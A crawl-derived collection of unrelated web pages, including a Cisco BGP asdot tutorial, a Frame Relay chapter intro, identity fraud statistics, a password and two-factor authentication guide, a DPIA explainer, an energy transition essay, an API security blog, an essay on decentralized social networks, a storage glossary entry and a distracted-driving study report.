R1#show ip bgp summary BGP router identifier 192.168.12.1, local AS number 12000012 BGP table version is 1, main routing table version 1 Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd 192.168.12.2 4 12000012 5 5 1 0 0 00:01:02 0
If you want, you can change the representation to the asdot format:
R1(config-router)#bgp asnotation ? dot asdot notation
Let’s change it:
R1(config-router)#bgp asnotation dot
You will now see the asdot format in all show commands:
R1#show ip bgp summary BGP router identifier 192.168.12.1, local AS number 183.6924 BGP table version is 1, main routing table version 1 Neighbor V AS MsgRcvd MsgSent TblVer InQ OutQ Up/Down State/PfxRcd 192.168.12.2 4 183.6924 6 6 1 0 0 00:02:38 0
AS 12000012 now shows up as AS 183.6924.
Want to take a look for yourself? Here you will find the startup configuration of each device.
hostname R1 ! ip cef ! interface GigabitEthernet0/1 ip address 192.168.12.1 255.255.255.0 ! router bgp 183.6924 bgp asnotation dot neighbor 192.168.12.2 remote-as 183.6924 ! end
hostname R2 ! ip cef ! interface GigabitEthernet0/1 ip address 192.168.12.2 255.255.255.0 ! router bgp 12000012 neighbor 192.168.12.1 remote-as 12000012 ! end
2-byte AS support
Let’s use two routers. R1 only supports 2-byte AS numbers, R2 supports 4-byte AS numbers:
R1 has no clue what an AS number above 65535 is: | <urn:uuid:be50d2de-a3e3-444a-a1e1-c2e92106f885> | CC-MAIN-2022-40 | https://networklessons.com/bgp/bgp-4-byte-number | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00688.warc.gz | en | 0.741901 | 1,429 | 2.890625 | 3 |
The topics and questions that this chapter addresses include the following:
Enabling Frame Relay encapsulation
Configuring LMI type on a Frame Relay interface
Configuring static and dynamic DLCI to network layer address mapping
Configuring Frame Relay subinterfaces
Configuring point-to-point subinterfaces
Configuring multipoint subinterfaces
Configuring a Cisco router as a Frame Relay switch
Configuring Frame Relay switching using a local significance approach to DLCI assignment
Configuring Frame Relay switching using a global significance approach to DLCI assignment
Verifying Frame Relay connections with Cisco IOS show commands
Troubleshooting Frame Relay connections with IOS debug commands
After completing this chapter, readers will be able to perform the basic Frame Relay configuration commands with the Cisco IOS software. Readers will be able to configure a basic Frame Relay network involving Cisco equipment and to perform basic monitoring and troubleshooting using relevant Cisco IOS show and debug commands.
Configuring Frame Relay
Frame Relay is configured on the Cisco router via the text-based Cisco IOS Command Line Interface (CLI). This section looks at the configuration commands required to configure basic Frame Relay operation on a Cisco router.
A basic setup involving the hardware configurations depicted in Figure 4-1 is used for this discussion and for illustration purposes. In the later part of this chapter, additional hardware will be required to explain more complex configuration tasks. In the setup used in this chapter, the Cisco routers are configured as Frame Relay access devices, or data terminal equipment (DTE), connected directly to a dedicated Frame Relay switch, or data circuit-terminating equipment (DCE). Note that Cisco routers can be configured to operate similarly as a Frame Relay switch as well. The configuration tasks will be fully explained in a later section.
Figure 4-1 Frame Relay Hardware Configuration
Different Cisco IOS software versions or releases may display slightly different outputs. To maintain consistency of the Cisco IOS Software Version, IOS 12.2(1) release is loaded on all routers used in the configuration examples of this chapter.
Example 4-1 displays the show output of the show version command on R1.
Example 4-1 IOS Version Loaded on the Lab Routers
R1#show version Cisco Internetwork Operating System Software IOS (tm) 7200 Software (C7200-JS-M), Version 12.2(1), RELEASE SOFTWARE (fc2) Copyright (c) 1986-2001 by cisco Systems, Inc. Compiled Thu 26-Apr-01 22:10 by cmong Image text-base: 0x60008960, data-base: 0x616B0000 | <urn:uuid:be7a59c1-981b-4fdc-b176-00e591bc5fdd> | CC-MAIN-2022-40 | https://www.ciscopress.com/articles/article.asp?p=170741&seqNum=11 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00688.warc.gz | en | 0.787005 | 561 | 2.78125 | 3 |
Identity fraud increased substantially in 2008, reversing a four-year trend of decreasing incidents. Researchers say identity fraud increased by 22 percent last year and they anticipate another 22 percent jump in 2009, attributing the increases to crimes of opportunity driven by the economic downturn1.
What’s more, despite recent headlines and growing fears about online security and data breaches, old-fashioned theft is the most popular way thieves steal identities and perpetrate identity fraud.
According to 2008 claim data compiled by Travelers, burglary and theft of wallets, purses and personal computers provide thieves the best opportunity to gain access to personal information. In instances where the victim knew their identity had been stolen, it was the result of personal property being stolen nearly 78 percent of the time.
Travelers identifies the following as the top known causes of identity fraud:
- 78% – burglary and theft of wallet/purse/personal identification/computer
- 14% – online or data breach
- 5% – change of address/postal fraud
- 3% – lost credit card and other miscellaneous causes.
What do thieves do with the information once they have it? More than 75 percent of the time, they use the information to open new credit card accounts or use the existing credit cards to make charges. Twenty percent of identity thieves will withdraw money from existing checking, savings and online accounts and 16 percent open utility accounts in the victim’s name. | <urn:uuid:41757296-752c-464b-8a09-6610b6449dc0> | CC-MAIN-2022-40 | https://www.helpnetsecurity.com/2009/11/02/top-causes-of-identity-fraud/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00688.warc.gz | en | 0.919426 | 292 | 2.875 | 3 |
Passwords are a terrible way to secure things. If you have a WordPress website, the only thing that protects your account is a username and password. Email accounts are even more vulnerable, as they are only protected by a password. Anyone can try to log in to your accounts, and we are seeing scripts that try to brute-force accounts all the time.
In addition, it is probably fair to say that most people are pretty bad at managing passwords. We like to be able to remember our passwords, but the only way to do so is by (re)using weak passwords, such as Rebecca1984 or Darling123. Passwords like that are easily compromised. In fact, there are various websites such as Kaspersky’s password checker that estimate how long it takes for someone to crack a password (Rebecca1984 takes three minutes and Darling123 takes 20 minutes).
This article covers basic steps you can take to secure your accounts. It won’t protect your accounts against, say, state-sponsored hackers. If the likes of GCHQ are after you then it is pretty much game over. Most attacks, though, are fairly basic. Attackers typically run scripts that try to log in to an account. They often try lots of weak passwords in a very short period of time. In other words, most attackers are after people who use weak passwords, or the “low hanging fruit”. The aim of this guide is to make sure you are not low hanging fruit.
The more complicated a password, the more secure your account is. Using names such as “Rebecca” or “Darling” in your password is a bad idea, as attackers typically try variations of common words: rebecca, Rebecca, rebecca1, Rebecca1 etc. Scripts can fire thousands of passwords at a login page, so it really doesn’t take that long before they have tried Rebecca1984. A password such as, say, lf8@NGRkx>c;DYt~iK is obviously going to be a lot harder to guess!
When you create a password in cPanel you have the option to generate a random password. We recommend creating a password that is at least 12 characters long and contains letters, numbers and symbols.
Image: cPanel’s password generator.
Unless you have an incredible memory you can’t remember every random password you create. To securely store your passwords you can use a password manager. There are lots of password managers, both free and paid-for. We like Bitwarden. It is free, open source and has been audited by independent security researchers. You can run Bitwarden as a desktop application or integrate it into your browser, and you can even host Bitwarden yourself.
Whichever password manager your choose, almost all have the same principle. You need to create a master password, which you use to unlock the password manager. You can then access all your passwords (and any other data you want to store securely, such as your National Insurance number). Obviously, you do need to pick a master password that is complicated but which you can remember. You might want to use a pass-phrase, such as “My horses like eating straw!” (which, according to the above-mentioned Kaspersky password checker takes 10000+ centuries to crack).
Multi-factor authentication (better known as two-factor authentication or 2FA) adds an extra layer of security to your accounts. A password, however strong, is just one factor of authentication. There are still various ways via which an attacker can get a password. Someone could get access to your password manager, or perhaps a website where you enter your password is running malicious code that looks for login credentials. Your operating system might have been compromised and have a keystroke logger installed.
The solution is to add a another factor of authentication. Your password is something you know, and is factor one. The second factor is typically something you have. That thing can be a so-called OTP code that is generated by an app on your smartphone.
Multi-factor authentication is available for both your hosting control panel (i.e. cPanel or Plesk) and your billing control panel. There are also various WordPress plugins that enable 2FA for your website. This is particularly useful. WordPress is widely used and therefore a popular target for attackers.
In your WordPress dashboard, select Plugins » Add New and search for “2FA” or “two factor authentication”. There are plenty of 2FA plugins and we can’t make recommendations. Take some time to read the descriptions of plugins that look suitable, and pay attention to both reviews from other users and how actively maintained the plugin is. You don’t want to install a plugin that has bad reviews and hasn’t been updated for over a year!
For this article we are going to install a plugin named Two-Factor. The plugin is free, has been actively maintained for years and users seem to like the plugin. It also has some useful features, such as backup codes (which you can use if you ever lose access to your 2FA app).
Image: Installing a WordPress 2FA plugin.
To install the plugin, simply click the Install Now button. This should take a few seconds, after which the button turns into an Activate button. You can now enable 2FA for individual users via the Users menu.
The plugin can send you an email with an OTP code or you can use an app such as Google Authenticator (the latter option is recommended). Next, you can either scan the QR code shown on the page or manually enter the code that appears below the image in your preferred 2FA app. The app will then start generating OTP codes. To complete the set-up you just need to enter an OTP code in the Authentication Code field.
If you lose your phone you also lose access to your 2FA codes. To prevent you are locked out of your own account you can use backup verification codes. These are codes you can enter at any time to get access – you can think of them as an OTP code that never changes. If you store the backup codes somewhere safe (such as a password manager) then you are always able to log in, even if you no longer have access to your 2FA app.
Not all 2FA plugins let you create backup codes, so that is one thing to check when deciding which plugin to use. In the case of the Two-Factor plugin you can get backup codes by clicking the Generate Verification Codes button in the plugin’s settings menu.
Image: generating backup codes.
Clicking the button gives you ten backup codes. Store them somewhere safe!
You don’t have to use a multi-factor authentication app on your phone. There are various desktop applications and browser plugins you use instead. For instance, in the below screenshot I use a browser plugin called Authenticator. The plugin is freely available for Chrome, Firefox, and Microsoft Edge.
Image: the Authenticator browser plugin.
So far we have only talked about things you can do to secure your accounts. You might wonder what we do to secure your accounts. There are lots of things we do, and we got an ISO 27001 Information Security Certificate to proof it.
All our servers are monitoring traffic for suspicious behaviour, including failed email and WordPress logins. When there are a number of failed logins in a short period of time the IP address from which the logins come is blocked. That does mean that we occasionally block someone who simply entered their logins incorrectly a number of times, but it does stop a very large number of attacks.
We are fairly strict when it comes to reducing attack vectors as well. For instance, we don’t allow SSH and remote database access on our shared hosting plans, and for other packages we put everything behind a VPN. Of course, we also look after our infrastructure. Our servers are patched regularly and we use multi-factor authentication everywhere.
And of course we make sure that multi-factor authentication can be used for all our hosting control panels as well as our billing control panel. We hope that you will make use of it! | <urn:uuid:c6abde9d-2764-4cc2-a730-4882787c968a> | CC-MAIN-2022-40 | https://www.catalyst2.com/knowledgebase/getting-started/password-hygiene-and-multi-factor-authentication/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00088.warc.gz | en | 0.93681 | 1,704 | 2.921875 | 3 |
What is a DPIA?
A DPIA (data protection impact assessment) is, effectively, a type of risk assessment. A core part of a DPIA is identifying risks and working out how likely they are to occur and the impact they would have. More specifically, a DPIA is an assessment of how a particular process will impact the protection of personal data, and its checklist of requirements differs to that of a typical information security risk assessment.
“A DPIA is a process designed to describe the processing, assess its necessity and proportionality and help manage the risks to the rights and freedoms of natural persons resulting from the processing of personal data by assessing them and determining the measures to address them.” – WP29 (Article 29 Working Party)
DPIAs are important tools for accountability. Described in Article 35 of the GDPR (General Data Protection Regulation), they are just one of the requirements that organizations need to comply with in order to protect the personal data they process. DPIAs help controllers not only comply with the requirements of the Regulation but also demonstrate that appropriate measures have been taken to ensure that compliance.
DPIAs are sometimes referred to as PIAs (privacy impact assessments). The terms are effectively interchangeable, but the GDPR refers exclusively to DPIAs, so that’s the term we use.
Why use the DPIA Tool?
Organizations that need to be GDPR compliant, also need to undertake a DPIA or at least answer the qualifying questions to find out if a DPIA is required.
When is a DPIA required?
A DPIA is required if a process is likely to result in a high risk to the rights and freedoms of data subjects (see below). This comprises:
- Using automation to make decisions that could significantly affect an individual;
- Processing sensitive data (health data, political views, sexuality, etc.) on a large scale; and
- Monitoring public areas on a large scale.
What is a data subject?
A data subject is any natural person (i.e. a living individual) whose personal data is processed by the organization. Data subjects might be employees, contractors, etc., as well as customers. Examples include advisers, agents, applicants, complainants, consultants, contractors, correspondents, enquirers, members, patients, representatives, researchers, students, suppliers, temporary workers and volunteers.
What constitutes a high-risk process?
A high-risk process is anything that meets the criteria outlined in Article 35 of the GDPR and guidance provided by the ICO and the WP29 (now replaced by the European Data Protection Board, which has endorsed the WP29’s DPIA guidelines). Identifying high-risk processes can be difficult, but any process that meets the criteria in the GDPR or guidance given by the ICO and the WP29 should definitely be considered high risk.
Who should conduct a DPIA?
- The controller is responsible for conducting DPIAs where they are required (as per Article 35).
- The processor is obliged to assist the controller with its DPIAs (as per Article 28,3(f)).
What is the DPIA Tool?
Our tool walks customers through the six steps they must complete as part of a DPIA.
- Step 1 – Process description: Contains a questionnaire that prompts users for information about the process in question.
- Step 2 – Screening questions: Contains screening questions that help users work out if they need to conduct a DPIA.
- Step 3 – Consultation: Contains a questionnaire that prompts users for information about the parties they’ve consulted (such as data subjects or their representatives).
- Step 4 – Principles questionnaire: Contains a questionnaire prompting users to provide information about the necessity and proportionality of processing — e.g. what measures they have in place to uphold data protection principles, data subject rights, etc.
- Step 5 – Privacy risk assessment: Gives users the means to identify individual risks to the rights and freedoms of data subjects, including evaluating levels of risks and determining risk responses.
- Step 6 – Review: Contains a brief questionnaire asking users about whether the DPIA has been reviewed and whether the process is authorized to go ahead.
The tool is didactic, meaning that you don’t have to be an expert to complete a DPIA. The tool will make sure that you answer all the right questions. Wherever possible, references are included in the relevant sections of the GDPR, so it’s straightforward to check why a question is being asked and its context.
The DPIA Tool is aligned with guidance from both the ICO and the WP29, ‘guaranteeing comprehensive DPIAs’.
For further information on how our DPIA Tool can help your organization stay GDPR cyber compliant, speak to our experts. If you’d like to see the tool in action, book a one-to-one demonstration today. | <urn:uuid:701dac1f-af88-48e0-94d3-8cf3a11bd9e9> | CC-MAIN-2022-40 | https://www.itgovernanceusa.com/blog/dpias-and-why-every-organization-needs-to-conduct-them | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00088.warc.gz | en | 0.925221 | 1,017 | 2.890625 | 3 |
The world we live in undergoing rapid change, from industrialization to urbanization to digitalization. Over the coming decades, the pressure on our environment will only intensify as the climate crisis remains under the global spotlight.
With global energy demand increasing, the energy landscape is evolving at pace and becoming more complex, so it’s critical that we stay focused on the end goal in our energy transition – the need for decarbonization.
Overview of energy transition
The energy transition is on everyone’s mind today; you hear about it everywhere you go – at conferences, in the news, even at your local pub. It is everyone’s vision, but it cannot happen without more innovation, new technologies and heaps of ambition.
The scale and rapidity of transition away from fossil fuels is unprecedented. Put simply, it is the largest in our history. It cannot even be compared to previous energy transitions. It took coal 125 years to overtake traditional biomass as a primary source of energy epitomised by Watt’s Steam Engine in 1776. It took a further 100 years for oil to overtake coal as a primary source and currently gas is expected to take the lead by 2030.
Yet to rapidly mitigate climate change effects, the world agrees that renewables need to become the primary source of energy no later than 2050. That is only 20 years after the previous transition. At the same time, the demand for energy continues to grow globally. Total global energy consumption today is approximately 150,000 TWh per year and the vast majority is delivered from fossil fuels. Alongside this the EIA (US Energy Information Administration) predicts an almost 50% increase in world energy usage by 2050 (comp. to 2019), led by growth in Asia.
To support this growing demand for energy and balance it with the need to reduce carbon emissions, the global fuel mix over the next 20 years must become far more diversified than before. According to BP’s Energy Outlook – to achieve net zero by 2050, the total final energy composition (excl. non-combusted energy) should consist of up to 85% electricity, hydrogen and bioenergy with carbon capture and storage playing a significant role.
In May this year, the International Energy Agency released their roadmap to net zero for the global energy sector, which outlined a two-pronged strategy; a decade of massive clean energy expansion using existing technology (2020s) and the integration of technologies (2030 – 2050) that are currently only at the demonstration or prototype phase.
What is clear, as we enter a multi decade transition, is that technology will be the key enabler to the diversification and hybridization of fuels.
So, how do we drive the energy transition forward?
The energy transition is becoming much more tangible, but it will take time, and there are countless paths to get to net zero that will affect the future energy system.
The journey is as important as the destination, we are not going to get there overnight, and we all have a part to play. Industry needs to work together in a a concerted and collective way.
Ultimately, supply must match demand, and this presents some challenges. Electricity and hydrogen will have an important role in the new energy mix, but the cost of this energy versus conventional fuel needs to be considered. With high capital costs for many it is simply not affordable to diversify quickly with investment cycles needed to be made. Similarly, renewables, which in many parts of the world are established sources of energy, remain intermittent and challenging to store. Socio-economic and political challenges also need to be considered with local circumstances, available energy sources and existing infrastructure differing greatly in markets and economies around the globe.
Therefore, as well as diversification, hybridization needs to occur. Fossil fuels will not disappear overnight, so it is important to ensure their production is as energy efficient and carbon neutral as possible. This can be achieved by integrating renewables and electrification into their production models. Likewise, the cleanest energy is the energy we save and enabling low carbon, efficient operations for existing operators is also vital. It’s time to reappraise the value of energy and ensure that energy efficiency and smart energy management is top priority. Every unit of energy, no matter how small, makes a difference.
Automation and digitalization can help reconcile all these industrial needs to ensure access to affordable, reliable and sustainable energy.
We are working closely with customers to deploy technologies that will help accelerate their energy transition, via electrification, the integration and growth of renewables, and by ensuring energy efficiency. This includes; delivering solutions for floating wind farms to power offshore oil and gas platforms, ensuring the reliability and stability of hydro and solar power, helping to reduce CO2 emissions in the steel industry by replacing coal with hydrogen in the steelmaking process, and working with electrolyzer manufacturers to optimize the production of green hydrogen.
There is no doubt that the energy transition is already forcing significant structural change to the energy landscape, but this is necessary and welcome change which ultimately will enable a clean energy future.
Today it is much more than the transition from fossil fuels to renewable energy – there are so many more dimensions – and we should not underestimate the advances that have already been made around the world. But if we are to sustain and accelerate these efforts, we need to continually invest and innovate, working together to ensure more sustainable, resilient, affordable, and secure energy for all.
By Brandon Spencer, President Energy Industries, ABB
Brandon Spencer is currently serving as President for ABB’s Energy Industries division globally. In this capacity he is a member of the Industrial Automation Business Area management team. The Energy Industries division helps companies across the energy industry develop, produce and operate safely, efficiently and profitably. Brandon joined ABB in 2006 and has dedicated his career to helping ABB’s customers achieve their goals and be more successful.
His responsibilities during his 15 years with the company include Global Account Management for both ConocoPhilips and ExxonMobil , Vice President of ABB’s Oil, Gas and Chemicals business in North America, as well as managing several of ABB’s large national accounts. Most recently (2018-2020), Brandon served as Managing Director for the Process Industries business line, covering Mining, Pulp & Paper, Metals, Aluminum, Cement, and Hybrid Industries.
Prior to joining ABB, Brandon served in various roles within Siemens Power Generation. These roles included positions in operations, service, and sales & marketing. Brandon holds a bachelor’s degree in economics and a master’s degree in business administration from the Crummer School of Business at Rollins College in Winter Park, FL. He is based in Houston, Texas. | <urn:uuid:24f210f5-65ec-49e1-a206-be508b73a685> | CC-MAIN-2022-40 | https://www.dailyhostnews.com/the-critical-role-of-energy-transition-in-reducing-the-worlds-carbon-footprint | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335058.80/warc/CC-MAIN-20220927194248-20220927224248-00088.warc.gz | en | 0.949155 | 1,377 | 3.234375 | 3 |
APIs are the hottest attack vector in modern software. In this blog, we’ll look at how APIs add risk and best practices for securing them.
For anyone who doesn’t know, API stands for Application Programming Interface. APIs provide a way for software programs to communicate with the external world. And securing these interfaces is a growing problem.
Historically, security teams have focused on securing the platform (networks and infrastructure) on which applications run. Today, teams use CWPP and CSPM solutions to help secure their cloud environments and workloads. And while these security tools are essential, they’re only one piece of the puzzle.
A bulletproof platform or cloud infrastructure is still vulnerable to insecure APIs. Why? Because developers are using APIs to punch holes through your otherwise secure cloud network (and feeding data directly to the outside world). Those security holes are valuable to hackers and bad actors.
When things go wrong, the fines resulting from API-related breaches can be hefty. For example, British Airways was fined over $200 million in 2018. And with 90% of developers using APIs, these security risks are everywhere.
Let’s take a look at some prominent examples of API-related data breaches.
Industry Examples of API Data Breaches
1 – Twitter API Data Breach (2022)
In August of this year, Twitter announced that a hacker accessed 5.4 million of its user records. The official reason for the data breach was “a code change introduced by a developer.” After the data breach, the records appeared for sale on a hacking forum.
Unfortunately, most solutions on the market don’t understand application architecture and can’t flag dangerous code changes at release time. Instead, teams wait for a (virtual) bomb to explode before they know unsafe code is running in production.
Twitter API request/response exposed user IDs
2 – Peloton API Data Breach (2021)
A security researcher found an unauthenticated API in Peloton’s software that allowed unauthorized access to personal identification information (PII) data. The hack enabled users to look up anyone registered for a class.
Luckily for Peloton, this vulnerability was discovered by white hat hackers, so they avoided fines. The bad news is that Peloton stock decreased by 15% when the press release came out.
Peloton API response showing private account data
3 – Facebook API Data Breach (2021)
A security researcher found a bug that allowed Facebook users to create posts on other users’ accounts. The researcher found that he could bypass authorization checks when making “unlisted” (invisible) posts.
This API vulnerability also allowed bad actors to share the posts they created, allowing misinformation to spread from any user account.
Facebook paid out a $30,000 bug bounty for this vulnerability. That’s a massive win for them because they’ve previously been fined over $5 billion (that’s billion, with a B) for consumer privacy violations.
A Facebook POST request allows the creation of posts on other user accounts.
How to Handle API Sprawl
Can you answer a simple question, “How many APIs exist in your production environment today?”
To increase the stakes, do you know how many of those APIs access sensitive data (PII, PCI, or PHI)?
This issue plagues security teams at organizations of all sizes. In fact, according to Gartner, “By 2025, less than 50% of enterprise APIs will be managed, as explosive growth in APIs surpasses the capabilities of API management tools.”
Beyond management, asking security teams to explain each API’s architectural context (and potential business impact) is a Herculean task.
So, where should security teams start?
Common Mistakes in API Security
Whether you’re starting an API security program from scratch or improving your existing process, it’s essential to feel confident in these three areas:
- API Discovery & Inventory
- Secure the API infrastructure
- Continuous API Security Testing
Here are some common pitfalls to avoid:
Analyzing API traffic/requests leads to incomplete API discovery
Shadow APIs (APIs that exist in production but are unknown to the organization) are a common concern for security teams. These are APIs created by development teams that aren’t appearing in API inventory tools.
Unfortunately, many teams cannot create their API inventory directly from the code running in production. Instead, they generate their inventory by watching network traffic and API calls. And these shadow APIs are not being called frequently (or at all) – hence why they’re in the shadows.
When hackers finally discover shadow APIs, the consequences can be immense. If an access point is unmanaged, there’s a high likelihood that it’s vulnerable.
Security teams can’t only rely on WAF, API Gateways, or IAM
Developers are human, and mistakes happen.
API vulnerabilities result from a variety of errors, including:
- Unauthenticated APIs
- Unsecured or Hardcoded API keys
- Broken Object Level Authorization
- API Logic Flaws
- Excessive API Data Exposure
- Lack of API Encryption
Unfortunately, there isn’t a single tool capable of protecting companies from these vulnerabilities. So, while WAF, API gateway, and access management solutions are all critical, they can’t guarantee your applications are secure. API testing is crucial for detecting these errors.
APIs testing is incomplete and infrequent
Mature software teams are good at testing their code logic before release. The bad news is that, often, APIs validation looks for intended (rather than unintended) functionality.
It’s essential to expect the worst from both your North-South (outside) and East-West (inside) traffic. An API testing strategy that validates it’s impossible to extract additional data is crucial.
Furthermore, API testing should occur every time a code change affects them. If your security program only tests APIs during l development, there’s a higher likelihood they will drift over time and become exploitable.
API Security Solutions on the Market
As API security occupies more real estate in tech professionals’ brains, it’s natural that solutions continue entering the market. Let’s look at some popular approaches.
API Discovery and Inventory
One popular approach to API discovery relies on a combination of developer diligence and runtime traffic. Combining OpenAPI (formerly Swagger) with an open source project, APIClarity provides an inventory of discoverable APIs, but it’s not guaranteed to capture all of them. There are also commercial solutions that monitor traffic to create an inventory.
An alternative API discovery solution increasing in popularity is analyzing the compiled code running in production. This approach ensures complete coverage of APIs but does not provide insights into user interactions.
API Threat Prevention
Just like a firewall on your operating system, it’s possible to intercept malicious traffic using a WAF (Web Application Firewall) and an API gateway. For this to be successful, it’s crucial to have a complete API inventory and an established API schema so your firewall behaves as expected.
Many vendors exist in this space, including specialty API security companies.
API Security Assessments and Scanning
API security assessments require sending incorrect or malicious requests to APIs to find bugs or problems. One popular open-source fuzzing solution is RESTler. Many ‘freemium’ and commercial tools are also available for API testing.
As API-driven software continues to expand, protecting sensitive data becomes increasingly crucial. Maturity in API security requires a complete inventory of APIs, followed by infrastructure that supports secure API data flows, and an automated test program.
If you’d like to learn more about ensuring you have a complete inventory of your APIs in production, book a demo with Bionic. | <urn:uuid:831128e6-83b3-4ff3-aa91-1a2df4f00a8a> | CC-MAIN-2022-40 | https://bionic.ai/blog/api-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00088.warc.gz | en | 0.902077 | 1,645 | 2.875 | 3 |
We live in an age, where we fear isolation. The one string which connects us with the rest of the world is social media. With people being constantly on the move, social networking websites provide the most accessible and affordable medium for news and entertainment. The widespread popularity of social media, and the vague regulations in place, have allowed several media giants to rise. Companies such as Facebook, Twitter and LinkedIn are big wigs who dominate and monopolize the social networking industry.
What’s more, these organisations have access to unbelievably large amounts of data. And with every passing day large amounts of data are uploaded and shared on social media channels. They monetize this information by selling it to advertising and marketing companies to create targeted campaigns. Which is not new information.
However, these social media giants have not only dominated the industry, but they have also set the norms for setting the frameworks for social media websites. For example, the server(s) which host the website fall under one authority, i.e. the creator (and owning) organisation. Moreover, the source code for the website is closed and inaccessible to anyone but the relevant personnel of the company. They control every single aspect of the website. And the most troubling aspect of this model, in the amount of control these organizations have over the content which shared on their feed. The companies have complete authority to censor information as well as promote certain content.
But after a series of data leak scares over the recent years, people are questioning the methods in which these monolith organisations operate. And are looking for alternatives which better facilitate the users’ basic internet rights.
One of those alternatives is a decentralised /distributed social network (DSN) or a federated social network.
The idea of DSNs cropped as a response to the blatant (and sometimes unethical) data mining which many social media networks undertake. The concept gained further noticeability when cryptocurrencies gained popularity. Today, millions of people are active users of at least one DSN. And while that may not compare to the billions of mainstream social media users, it still is a considerably big user base. Some of the more popular DSNs today are Mastodon, Diaspora*, Sphere, Obsidian and Steemit.
A DSN works on a very different ideology to mainstream social networking websites. Most of them follow three basic principles – data security, privacy and transparency. Unlike Facebook and Twitter, DSNs are hosted on multiple servers owned by different people. And since these websites are usually open sourced, anyone can download the code and tweak it to create their own network. Or improve the existing one. So, instead of operating on a mediated private server, DSNs work based on peer-to-peer interaction.
Moreover, most DSNs offer encrypted messaging services and the option of anonymity to its users. In fact, some DSNs do not ask for proof of identification like a phone number while signing up. Strong advocates of this alternative form of social networking emphasize that this allows the user to be completely in control of their own profile. And the content shared on it. They can control what they see, what to show and who to show the content to. Websites like Mastodon also refuse to host paid advertising in its platform. Hence users would get to see genuine content instead of sponsored campaigns. On the other hand, some websites like Steemit and Sphere allow users to monetize their content, by utilizing the concept of cryptocurrency, or ‘tokens’.
However, while the idea of DSNs is a good one, it is not a fool-proof method to combat mainstream social media. There are still several challenges and disadvantages to using a DSN account.
The most obvious challenge is attracting permanent user base. Despite the already existing user count being more than a million, DSN is still relatively unheard of. People prefer to use main-stream social media like Facebook and Twitter because they are super easy to use. DSNs on the other hand, can be difficult for newbie users to navigate through.
Moreover, not everyone is interested to host a web server on their computer. And this further drives the average internet user away from signing up on a DSN.
Another pretty serious challenge which creators of DSNs face is security. Whether they agree or not. The fact of the matter is that most DSNs do not ask for real world identity proofs. In turn they rely on public key cryptography to enforce security for their user accounts. However, this extremely difficult to manage. Not to mention, the basic issues that plague social media – like fake accounts, incorrect information sources, fake news, echo chambers and filter bubbles, persist.
In conclusion, the concept of DSNs is very promising. The intentions of its creators to change the internet back into an open free web is noble. And it is good to know that there are, alternatives to Facebook and Twitter. However, there remains a lot to be done before a DSN can be considered as fool proof replacement to mainstream social media sites.
So, which one will you choose? Mainstream social media, or a decentralised one? | <urn:uuid:d2ad0734-662f-4f65-8601-daba77fa501a> | CC-MAIN-2022-40 | https://www.crayondata.com/decentralized-social-networks-the-choice-is-yours/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00088.warc.gz | en | 0.944106 | 1,053 | 2.765625 | 3 |
Data Management Glossary
High Performance Storage
High performance storage is a type of storage management system designed for moving large files and large amounts of data around a network. High performance storage is especially valuable for moving around large amounts of complex data or unstructured data like large video files across the network.
Used with both direct-connected and network-attached storage, high performance storage supports data transfer rates greater than one gigabyte per second and is designed for enterprises handling large quantities of data – in the petabyte range.
High performance storage supports a variety of methods for accessing and creating data, including FTP, parallel FTP, VFS (Linux), as well as a robust client API with support for parallel I/O.
High performance storage is useful to manage hot or active data, but can be very expensive for cold/inactive data. Since over 60 to 90% of data in an organization is typically inactive/cold within months of creation, this data should be moved off high performance storage to get the best TCO of storage without sacrificing performance. | <urn:uuid:6535a425-aaf8-47f5-b061-549c42a8b942> | CC-MAIN-2022-40 | https://www.komprise.com/glossary_terms/high-performance-storage/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00088.warc.gz | en | 0.936725 | 213 | 2.75 | 3 |
An analysis of driver behavior data found that drivers are growing more distracted by their devices.
Drivers are 10 percent more distracted now than last year, a problem driven largely by smartphones, according to new research from Zendrive, a company that collects and analyzes data on driver behaviors.
“Out from under the shadows, phone addicts have positioned themselves as public enemy number one, replacing drunk drivers as the ultimate threat on the road," says the 2019 distracted driving study, released this week.
The study analyzed driving data from 1.8 million anonymized drivers over 92 days, for a total of 4.5 billion miles. All data comes from smartphone sensors, which detect phone usage “when the driver handles the phone for a certain period of time for various purposes such as talking, texting, or navigating.” Researchers also spoke to 500 drivers to obtain details on how they use phones while driving, including which apps were most commonly tapped by people behind the wheel.
The results found that “phone addicts”—broadly defined as people who are unable or unwilling to put away their phones while driving—pick up their phones four times more than the average driver, use their phone six times longer and have their eyes off the road 28 percent of the time. And their numbers are increasing—the number of “hardcore phone addicts” identified by the company doubled from last year.
“Today, one in 12 drivers on the road is a phone addict,” the report says. “If these trends continue, as many as one in every five drivers could be in the phone addict category by 2022.”
Drivers distracted by their phones may already be more dangerous than drunk drivers. In 2016, the National Highway Traffic Safety Administration reported 10,497 deaths as a result of drunk driving, and 3,450 deaths from distracted drivers. But fatalities caused by driver phone use are more difficult to track and likely underreported, according to the report.
“Drivers failing to admit they were distracted prior to a crash and inconsistencies in police reports make it difficult to arrive at an accurate number,” it says. “But there are other reasons to believe mobile phones are deadlier than NHTSA suggests.”
For example, roughly 660,000 drivers use their cell phones while driving, according to NHTSA data. Last year, Zendrive data showed “that the problem was 100 times worse than reported by the government’s dataset. Over 69 million people use their phones at least once in awhile behind the wheel.”
And those people are driving day and night, the report notes, while drunk drivers are most active between midnight and 3 a.m. That means “that both in number and in timing, distracted drivers are a bigger danger than drunk drivers.”
